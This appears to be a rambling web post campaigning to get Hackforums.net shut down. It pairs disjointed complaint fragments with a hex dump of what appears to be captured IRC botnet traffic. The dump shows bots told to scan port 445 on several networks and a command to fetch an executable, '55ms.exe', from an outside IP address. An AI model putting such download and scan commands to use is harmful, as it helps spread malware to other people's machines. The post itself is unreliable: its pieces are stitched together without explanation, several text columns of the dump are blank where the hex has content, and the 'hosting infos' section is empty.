Hackforums.net Investigation

We are working to get Hackforums.net shut down. We feel strongly that it a website which has an undue influence on young people as well as promoting illegal computer activities such as hacking, virus spreading, manipulation of online financial services etc.

I'm not certain of what your criteria if for judging a site to be 'positive for malware'. I know that is not an easy threat to withstand and I don't blame this site for exercising caution and withdrawing the 'positive' for malware decision.

Hackforums.net - "Infecting one another with malware."

We are reporting this site for illegal activitie and it should be closed as soon as posible!

Legal internet law will clean all illegal activities and we will help realise it!

[IT Security Team] botnet hosted in China Zhejiang Ninbo Lanzhong Network Ltd)

Remote Host Port Number 6943 PASS laorosr 80 80 80

MODE [N00_USA_XP_1295223]
@ -ix
00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR
00000010 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
00000020 | 505F 3132 3935 BCB9 4020 3A20 5261 6E64 | P_1295..@ : Rand
00000030 | 6F6D 2050 6F72 7420 5363 616E 2073 7461 | om Port Scan sta
00000040 | 7274 6564 206F 6E20 3137 342E 3133 332E | rted on 174.133.
00000050 | 782E 783A 3434 3520 7769 7468 2061 2064 | x.x:445 with a d
00000060 | 656C 6179 206F 6620 3520 7365 636F 6E64 | elay of 5 second
00000070 | 7320 666F 7220 3020 6D69 6E75 7465 7320 | s for 0 minutes
00000080 | 7573 696E 6720 3235 2074 6872 6561 6473 | using 25 threads
00000090 | 2E0D 0A50 5252 564D 5347 205B 4E30 305F | ...PRRVMSG [N00_
000000A0 | 5553 415F 5850 5F31 3239 35BC B940 203A | USA_XP_1295..@ :
000000B0 | 2053 6571 7565 6E74 6961 6C20 506F 7274 | Sequential Port
000000C0 | 2053 6361 6E20 7374 6172 7465 6420 6F6E | Scan started on
000000D0 | 2031 3932 2E31 3638 2E30 2E30 3A34 3435 |
000000E0 | 2077 6974 6820 6120 6465 6C61 7920 6F66 | with a delay of
000000F0 | 2035 2073 6563 6F6E 6473 2066 6F72 2030 | 5 seconds for 0
00000100 | 206D 696E 7574 6573 2075 7369 6E67 2032 | minutes using 2
00000110 | 3020 7468 7265 6164 732E 0D0A 5052 5256 | 0 threads...PRRV
00000120 | 4D53 4720 5B4E 3030 5F55 5341 5F58 505F | MSG [N00_USA_XP_
00000130 | 3132 3935 BCB9 4020 3A20 5365 7175 656E | 1295..@ : Sequen
00000140 | 7469 616C 2050 6F72 7420 5363 616E 2073 | tial Port Scan s
00000150 | 7461 7274 6564 206F 6E20 3139 322E 3136 | tarted on 192.16
00000160 | 382E 3632 2E30 3A34 3435 2077 6974 6820 | 8.62.0:445 with
00000170 | 6120 6465 6C61 7920 6F66 2035 2073 6563 | a delay of 5 sec
00000180 | 6F6E 6473 2066 6F72 2030 206D 696E 7574 | onds for 0 minut
00000190 | 6573 2075 7369 6E67 2032 3020 7468 7265 | es using 20 thre
000001A0 | 6164 732E 0D0A 5052 5256 4D53 4720 5B4E | ads...PRRVMSG [N
000001B0 | 3030 5F55 5341 5F58 505F 3132 3935 BCB9 | 00_USA_XP_1295..
000001C0 | 4020 3A20 5365 7175 656E 7469 616C 2050 | @ : Sequential P
000001D0 | 6F72 7420 5363 616E 2073 7461 7274 6564 | ort Scan started
000001E0 | 206F 6E20 3139 322E 302E 302E 303A 3434 | on
000001F0 | 3520 7769 7468 2061 2064 656C 6179 206F | 5 with a delay o
00000200 | 6620 3520 7365 636F 6E64 7320 666F 7220 | f 5 seconds for
00000210 | 3020 6D69 6E75 7465 7320 7573 696E 6720 | 0 minutes using
00000220 | 3130 2074 6872 6561 6473 2E0D 0A4B 4349 | 10 threads...KCI
00000230 | 4B20 5B4E 3030 5F55 5341 5F58 505F 3132 | K [N00_USA_XP_12
00000240 | 3935 3232 335D 18E7 400D 0A72 7373 7220 | 95223]..@..rssr
00000250 | 5350 322D 3238 3520 2A20 3020 3A43 4F4D | SP2-285 * 0 :COM
00000260 | 5055 5445 524E 414D 450D 0A73 656E 6420 | PUTERNAME..send
00000270 | 236A 2C23 4D61 206F 6F6F 6F0D 0A50 5252 | #j,#Ma oooo..PRR
00000280 | 564D 5347 2023 6920 3A48 5454 5020 5345 | VMSG #i :HTTP SE
00000290 | 5420 6874 7470 3A2F 2F33 312E 3138 342E | T http://31.184.
000002A0 | 3233 372E 3433 2F35 356D 732E 6578 650D | 237.43/55ms.exe.
000002B0 | 0A50 5252 564D 5347 205B 4E30 305F 5553 | .PRRVMSG [N00_US
000002C0 | 415F 5850 5F31 3239 35BC B940 203A 2052 | A_XP_1295..@ : R
000002D0 | 616E 646F 6D20 506F 7274 2053 6361 6E20 | andom Port Scan
000002E0 | 7374 6172 7465 6420 6F6E 2031 3734 2E78 | started on 174.x
000002F0 | 2E78 2E78 3A34 3435 2077 6974 6820 6120 | .x.x:445 with a
00000300 | 6465 6C61 7920 6F66 2035 2073 6563 6F6E | delay of 5 secon
00000310 | 6473 2066 6F72 2030 206D 696E 7574 6573 | ds for 0 minutes
00000320 | 2075 7369 6E67 2032 3520 7468 7265 6164 | using 25 thread
00000330 | 732E 0D0A | s...

hosting infos: